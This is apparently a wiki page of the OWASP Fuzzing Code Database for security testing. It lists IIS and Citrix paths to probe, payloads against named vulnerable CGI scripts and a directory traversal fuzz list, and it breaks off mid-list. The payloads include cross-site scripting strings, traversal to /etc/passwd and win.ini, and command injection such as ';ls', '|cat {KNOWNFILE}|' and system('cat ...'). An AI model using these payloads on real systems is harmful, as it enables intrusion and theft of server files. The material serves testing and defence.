1 - The statements of the ASDR Project <br />
<br />
2 - Browser <br />
<br />
3 - Operating System <br />
<br />
4 - Databases <br />
<br />
A URL will also be published to create a collaborative environment for the maintenance process, where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if it is not valid yet and not maintained in another database. <br />
<br />
2 - A list where, besides the statement, a single id will be maintained to identify each statement, with a description and the results of the exploitation. <br />
<br />
3 - The possibility for users to report their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Microsoft URLs (18 March 2010) ===<br />
<pre># Interesting IIS Files & Directories (17 March, 2009)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely means the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s. <br />
# Alternatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
index.shtml<br />
x.htw<br />
x.ida<br />
x.idq<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibility, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
\../{FILE}<br />
\../\../{FILE}<br />
\../\../\../{FILE}<br />
\../\../\../\../{FILE}<br />
\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../\../{FILE}<br />
/..\{FILE}<br />
/..\/..\{FILE}<br />
/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}<br />
